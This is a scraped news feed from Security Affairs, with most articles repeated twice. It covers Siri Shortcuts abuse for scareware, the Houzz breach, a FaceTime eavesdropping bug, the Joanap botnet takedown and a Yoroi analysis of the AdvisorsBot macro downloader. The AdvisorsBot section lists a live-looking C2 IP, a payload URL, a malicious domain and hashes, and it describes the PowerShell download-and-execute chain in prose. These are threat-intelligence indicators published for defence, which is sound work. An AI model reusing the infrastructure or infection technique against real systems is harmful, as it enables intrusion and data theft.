“To move the user to the ransom payment stage, the shortcut could automatically access the Internet, browsing to a URL that contains payment information via cryptocurrency wallets, and demand that the user pay-up or see their data deleted, or exposed on the Internet,” continues the post.

What’s making this attack scenario more scaring is that the attacker could configure the malicious Shortcut to spread to the victim’s contact list, with this trick they prompt potential victims to download and install the malicious Shortcut.

Below a video PoC of the hack that shows how a Shortcut can change the device’s brightness and volume, can speak a ransom note that includes convincing personal details, can turn the flashlight on and off while vibrating at the same time, can display the spoken note in a written alert, and access the URL of a page containing payment information, in addition to spreading via messages to users’ contacts.

“In our security research labs, we tested the ransom attack scenario. The shortcut we created was named ‘Ransom’ in the video, but it could easily be named any other name to entice users to run it. Lures, such as game cheats/hacking, unlocking secret functionality in apps, or getting free money, often entice users to tap on a shortcut and see where it leads,” explained John Kuhn, senior threat researcher at IBM Managed Security Services.

Siri Shortcuts open the door to a broad range of social engineering attacks, they could be abused to trick victims into installing any kind of malware on their devices.

Below some recommendations shared by the experts:

  1. Never install a Shortcut from an untrusted source.
  2. Check the permissions that the shortcut is requesting and never give permission to portions of your phone you are not comfortable with. Things like photos, location and camera could be used to obtain sensitive information.
  3. Use the show actions button before installing a third-party shortcut to see the underlying actions the shortcut might take. Look for things like messaging data to numbers you don’t recognize, emailing data out, or making SSH server connections to servers.

Pierluigi Paganini

(SecurityAffairs – Siri Shortcuts, hacking)

The post IBM experts warn of malicious abuses of Apple Siri Shortcuts appeared first on Security Affairs.



Security Affairs

IBM experts warn of malicious abuses of Apple Siri Shortcuts

IBM’s security researchers demonstrated that the Siri Shortcuts introduced in the Apple iOS 12 can be abused by attackers.

Apple implemented Siri Shortcuts in the iOS 12 to allow users to rapidly access to applications and features, they can automate common tasks and can be integrated by third-party developers in their software.

Researchers at IBM Managed Security Services discovered that
Siri Shortcuts can be abused by hackers to perform malicious activities.

“This new feature can be enabled via third-party developers in their apps, or custom built by users downloading the shortcuts app from the app store. Once downloaded and installed, the Shortcuts app grants the power of scripting to perform complex tasks on users’ personal devices.” reads the analysis published by IBM.

“But accessing the phone from Siri Shortcuts also presents some potential security risks that were discovered by X-Force IRIS and reported to Apple’s security team.”

Experts pointed out that Siri Shortcuts improve interactions between users and the device, it allows the implementation of access directly from the lock screen or through existing apps. Users can also share the Shortcuts from the apps via iCloud.

The shortcuts can be presented by developers on the lock screen or in ‘search’ field, based on time, location and context.

“The shortcut can then appear on the lock screen or in ‘search’ when it is deemed appropriate to show it to the user based on time, location and context.” continues the analysis.

“For example, a user approaches their usual coffee shop, and the relevant app pops up a shortcut on the screen to allow them to order the usual cup of java and pay for it on the app before they even enter the coffee shop.”

siri shortcuts

Experts at IBM explained that the new feature could be used to create for malicious purposes such as scareware, a pseudo ransom campaign that attempts to scare victims and trick them into paying attackers by making them believe their data were stolen by hackers.

The attackers can use native shortcut functionality, they can develop a script to provide the ransom demands to the device’s owner by using Siri’s voice. Attackers can also automate data collection from the device (user’s current physical address, IP address, contents of the clipboard, stored pictures/videos, contact information and more) and send them to the victims to scare them.

“To move the user to the ransom payment stage, the shortcut could automatically access the Internet, browsing to a URL that contains payment information via cryptocurrency wallets, and demand that the user pay-up or see their data deleted, or exposed on the Internet,” continues the post.

What’s making this attack scenario more scaring is that the attacker could configure the malicious Shortcut to spread to the victim’s contact list, with this trick they prompt potential victims to download and install the malicious Shortcut.

Below a video PoC of the hack that shows how a Shortcut can change the device’s brightness and volume, can speak a ransom note that includes convincing personal details, can turn the flashlight on and off while vibrating at the same time, can display the spoken note in a written alert, and access the URL of a page containing payment information, in addition to spreading via messages to users’ contacts.

“In our security research labs, we tested the ransom attack scenario. The shortcut we created was named ‘Ransom’ in the video, but it could easily be named any other name to entice users to run it. Lures, such as game cheats/hacking, unlocking secret functionality in apps, or getting free money, often entice users to tap on a shortcut and see where it leads,” explained John Kuhn, senior threat researcher at IBM Managed Security Services.

Siri Shortcuts open the door to a broad range of social engineering attacks, they could be abused to trick victims into installing any kind of malware on their devices.

Below some recommendations shared by the experts:

  1. Never install a Shortcut from an untrusted source.
  2. Check the permissions that the shortcut is requesting and never give permission to portions of your phone you are not comfortable with. Things like photos, location and camera could be used to obtain sensitive information.
  3. Use the show actions button before installing a third-party shortcut to see the underlying actions the shortcut might take. Look for things like messaging data to numbers you don’t recognize, emailing data out, or making SSH server connections to servers.

Pierluigi Paganini

(SecurityAffairs – Siri Shortcuts, hacking)

The post IBM experts warn of malicious abuses of Apple Siri Shortcuts appeared first on Security Affairs.

Security Affairs: Home Design website Houzz suffered a data breach

The home remodeling and design platform Houzz informed customers that it suffered a data breach that exposed some personal information.

The popular home design platform Houzz has suffered a data breach that exposed some personal information.

Houzz has over 40 million monthly unique users, at the time is not clear how many individuals are affected.

houzz data breach

The company learned in late December that of an unathorized access to its user data and started notifying its users.

The company discovered that a file containing user data was obtained by an “unauthorized third party.”

Houzz recently learned that a file containing some of our user data was obtained by an unauthorized third party. The security of user data is our priority. We immediately launched an investigation and engaged with a leading forensics firm to assist in our investigation, containment, and remediation efforts. We have also notified law enforcement authorities.” reads the data breach notification published by the company.

“Out of an abundance of caution, we have notified all Houzz users who may have been affected.”

The company is investigating the issue to discover how hackers obtained the data, it notified law enforcement and hired a forensics firm to assist it.

“Our security team has a number of ways to learn about potential security vulnerabilities, including our own active methods and third-party reporting.” continues the notification.

The file obtained by the unauthorized third party included information such as name, city, state, country, description and also some internal identifiers used by Houzz systems

The company revealed that exposed data also included usernames, password hashes, IP addresses, and user’s Facebook ID in case the users accessed to the platform through Facebook.

Hackers did not access social security numbers or financial information.

The company suggest users reset the password and revealed that it uses a unique salt for each password.

“You may reset your password at https://www.houzz.com/changePassword. Please note that in order to reset your password, you will need to have access to the email address that is associated with your Houzz profile.” continues the notification.

“We do not believe that any passwords were compromised because we do not actually store passwords except in a one-way encrypted form that is salted uniquely per user. However, we recommend changing your password on any other sites or accounts where you used the same login information that you used for Houzz. It is generally best practice to use a unique password for each service.”

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Home Design website Houzz suffered a data breach appeared first on Security Affairs.



Security Affairs

Home Design website Houzz suffered a data breach

The home remodeling and design platform Houzz informed customers that it suffered a data breach that exposed some personal information.

The popular home design platform Houzz has suffered a data breach that exposed some personal information.

Houzz has over 40 million monthly unique users, at the time is not clear how many individuals are affected.

houzz data breach

The company learned in late December that of an unathorized access to its user data and started notifying its users.

The company discovered that a file containing user data was obtained by an “unauthorized third party.”

Houzz recently learned that a file containing some of our user data was obtained by an unauthorized third party. The security of user data is our priority. We immediately launched an investigation and engaged with a leading forensics firm to assist in our investigation, containment, and remediation efforts. We have also notified law enforcement authorities.” reads the data breach notification published by the company.

“Out of an abundance of caution, we have notified all Houzz users who may have been affected.”

The company is investigating the issue to discover how hackers obtained the data, it notified law enforcement and hired a forensics firm to assist it.

“Our security team has a number of ways to learn about potential security vulnerabilities, including our own active methods and third-party reporting.” continues the notification.

The file obtained by the unauthorized third party included information such as name, city, state, country, description and also some internal identifiers used by Houzz systems

The company revealed that exposed data also included usernames, password hashes, IP addresses, and user’s Facebook ID in case the users accessed to the platform through Facebook.

Hackers did not access social security numbers or financial information.

The company suggest users reset the password and revealed that it uses a unique salt for each password.

“You may reset your password at https://www.houzz.com/changePassword. Please note that in order to reset your password, you will need to have access to the email address that is associated with your Houzz profile.” continues the notification.

“We do not believe that any passwords were compromised because we do not actually store passwords except in a one-way encrypted form that is salted uniquely per user. However, we recommend changing your password on any other sites or accounts where you used the same login information that you used for Houzz. It is generally best practice to use a unique password for each service.”

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Home Design website Houzz suffered a data breach appeared first on Security Affairs.

Apple issued a partial fix for recent FaceTime spying bug

On Friday, Apple announced that the FaceTime issue recently discovered has been partially fixed, the company plans to release a complete update next week.

This week, Apple issued a partial fix for the FaceTime issue recently discovered, the tech giant plans to release a complete update next week.

Apple experts implemented a server-side patch, but the Group FaceTime feature will be enabled again next week.

The security vulnerability in the Apple FaceTime lets you hear the audio of the person you are calling before they pick up the call by adding your number to a group chat.

On the receiver’s side, it appears as if the call still hasn’t been answered.

The bug was discovered by Grant Thompson, a 14-year-old from Arizona, who attempted to report the flaw to Apple for more than 10 days without success.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affected iOS 12.1 and 12.2 versions, and macOS Mojave.

FaceTime bug

Just after the bug was disclosed, Apple suspended the Group FaceTime feature.

Apple has officially thanked Thompson for reporting the bug apologized for the delay in receiving the report. The company has promised to improve the process for receiving reports such as the one related to the FaceTime issue.

“We sincerely apologize to our customers who were affected and all who were concerned about this security issue. We appreciate everyone’s patience as we complete this process,” reads the statement issued by Apple.

“We want to assure our customers that as soon as our engineering team became aware of the details necessary to reproduce the bug, they quickly disabled Group FaceTime and began work on the fix,”.

The New York attorney general and Governor Andrew M. Cuomo and Attorney General Letitia James announced a probe into the failure to report the flaw to the customers and the delay in responding to the report.

“In the wake of this egregious bug that put the privacy of New Yorkers at risk, I support this investigation by the Attorney General into this serious consumer rights issue and direct the Division of Consumer Protection to help in any way possible,” Governor Cuomo announced. “We need a full accounting of the facts to confirm businesses are abiding by New York consumer protection laws and to help make sure this type of privacy breach does not happen again.”

“This FaceTime breach is a serious threat to the security and privacy of the millions of New Yorkers who have put their trust in Apple and its products over the years.said Attorney General James.

“My office will be conducting a thorough investigation into Apple’s response to the situation, and will evaluate the company’s actions in relation to the laws set forth by the State of New York. We must use every tool at our disposal to ensure that consumers are always protected.”

Pierluigi Paganini

(SecurityAffairs – FaceTime bug, privacy)

The post Apple issued a partial fix for recent FaceTime spying bug appeared first on Security Affairs.

Security Affairs: Apple issued a partial fix for recent FaceTime spying bug

On Friday, Apple announced that the FaceTime issue recently discovered has been partially fixed, the company plans to release a complete update next week.

This week, Apple issued a partial fix for the FaceTime issue recently discovered, the tech giant plans to release a complete update next week.

Apple experts implemented a server-side patch, but the Group FaceTime feature will be enabled again next week.

The security vulnerability in the Apple FaceTime lets you hear the audio of the person you are calling before they pick up the call by adding your number to a group chat.

On the receiver’s side, it appears as if the call still hasn’t been answered.

The bug was discovered by Grant Thompson, a 14-year-old from Arizona, who attempted to report the flaw to Apple for more than 10 days without success.

“There’s a major bug in FaceTime right now that lets you connect to someone and hear their audio without the person even accepting the call.” reads a thread published on MacRumors.  

“This bug is making the rounds on social media, and as 9to5Mac points out, there are major privacy concerns involved. You can force a FaceTime call with someone and hear what they’re saying, perhaps even without their knowledge. 

We tested the bug at MacRumors and were able to initiate a FaceTime call with each other where we could hear the person on the other end without ever having pressed the button to accept the call.”

The flaw affected iOS 12.1 and 12.2 versions, and macOS Mojave.

FaceTime bug

Just after the bug was disclosed, Apple suspended the Group FaceTime feature.

Apple has officially thanked Thompson for reporting the bug apologized for the delay in receiving the report. The company has promised to improve the process for receiving reports such as the one related to the FaceTime issue.

“We sincerely apologize to our customers who were affected and all who were concerned about this security issue. We appreciate everyone’s patience as we complete this process,” reads the statement issued by Apple.

“We want to assure our customers that as soon as our engineering team became aware of the details necessary to reproduce the bug, they quickly disabled Group FaceTime and began work on the fix,”.

The New York attorney general and Governor Andrew M. Cuomo and Attorney General Letitia James announced a probe into the failure to report the flaw to the customers and the delay in responding to the report.

“In the wake of this egregious bug that put the privacy of New Yorkers at risk, I support this investigation by the Attorney General into this serious consumer rights issue and direct the Division of Consumer Protection to help in any way possible,” Governor Cuomo announced. “We need a full accounting of the facts to confirm businesses are abiding by New York consumer protection laws and to help make sure this type of privacy breach does not happen again.”

“This FaceTime breach is a serious threat to the security and privacy of the millions of New Yorkers who have put their trust in Apple and its products over the years.” said Attorney General James.

“My office will be conducting a thorough investigation into Apple’s response to the situation, and will evaluate the company’s actions in relation to the laws set forth by the State of New York. We must use every tool at our disposal to ensure that consumers are always protected.”

Pierluigi Paganini

(SecurityAffairs – FaceTime bug, privacy)

The post Apple issued a partial fix for recent FaceTime spying bug appeared first on Security Affairs.



Security Affairs

Security Affairs: US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastrcuture.

The U.S. Justice Department declares war to the Joanap Botnet that is associated with North Korea. 

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure that is believed to be associated to Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

The Joanap bot is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems, it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share them with ISP and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attaches that works with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009, experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by using the Brambul SMB worm that is able to spreads through a network by brute-forcing SMB shares leveraging on a list of hard-coded credentials.

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt,

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group, according to the authorities it was involved in numerous computer intrusions in which he had used also the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government.  That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities.  The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy. “

The good news for users is that the Joanap is not effective against updated Microsoft Windows systems running Windows Defender and using Windows Update. Most of the antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.



Security Affairs

US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastrcuture.

The U.S. Justice Department declares war to the Joanap Botnet that is associated with North Korea. 

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure that is believed to be associated to Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

The Joanap bot is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems, it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share them with ISP and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attaches that works with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009, experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by using the Brambul SMB worm that is able to spreads through a network by brute-forcing SMB shares leveraging on a list of hard-coded credentials.

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

“Computers around the world remain infected by a botnet associated with the North Korean Regime,” said Assistant Attorney General John Demers. “Through this operation, we are working to eradicate the threat that North Korea state hackers pose to the confidentiality, integrity, and availability of data. This operation is another example of the Justice Department’s efforts to use every tool at our disposal to disrupt national security threat actors, including, but by no means limited to, prosecution.”

“Through technical means and legal process, the FBI continually seeks to disrupt the malicious cyber activities of North Korean cybercriminals, as in this case, and all cyber actors who pose a threat to the United States and our international partners.” explained ADIC Paul Delacourt,

In June 2018, the FBI filed a complaint against the North Korean citizen Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group, according to the authorities it was involved in numerous computer intrusions in which he had used also the Brambul malware to gain unauthorized access to computers.

“Moreover, a complaint was filed on June 8, 2018, charging Park Jin Hyok with a conspiracy to carry out numerous computer intrusions backed by the North Korean government.  That complaint alleged how co-conspirators used Brambul to gain unauthorized access to computers, and then used those computers to carry out the charged malicious cyber activities.  The Brambul worm itself was recovered from the computer networks of some victims of the conspiracy. “

The good news for users is that the Joanap is not effective against updated Microsoft Windows systems running Windows Defender and using Windows Update. Most of the antivirus programs are also able to detect both Joanap and Brambul.

Pierluigi Paganini

(SecurityAffairs – Joanap botnet, North Korea)

The post US authorities aim to dismantle North Korea’s Joanap Botnet appeared first on Security Affairs.

Security Affairs: The return of the AdvisorsBot malware

Security experts at Cybaze– Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized Microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them. 

The following figure shown a workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection. 

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script. 

Figure 5 – Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”). 

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine. 

Figure 7 – System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 – Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable. 

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 – Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures. 

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidence on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell. 

Similar vector was used in recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth

Further details, including IoCs and Yara rules, are reported in the analysis published

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.



Security Affairs

The return of the AdvisorsBot malware

Security experts at Cybaze– Yoroi ZLab have analyzed a new sample of the AdvisorsBot malware, a downloader that was first spotted in August 2018.

As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized Microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them. 

The following figure shown a workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection. 

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script. 

Figure 5 – Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”). 

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine. 

Figure 7 – System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 – Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable. 

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 – Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures. 

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidence on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell. 

Similar vector was used in recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth

Further details, including IoCs and Yara rules, are reported in the analysis published

https://blog.yoroi.company/research/the-return-of-advisorsbot/

Pierluigi Paganini

(SecurityAffairs – AdvisorsBot, malware)

The post The return of the AdvisorsBot malware appeared first on Security Affairs.

Security Affairs: State Bank of India left archive with millions of Customer messages exposed

Another data breach made the headlines, this time the victim is the State Bank of India that left a database containing personal information exposed online.

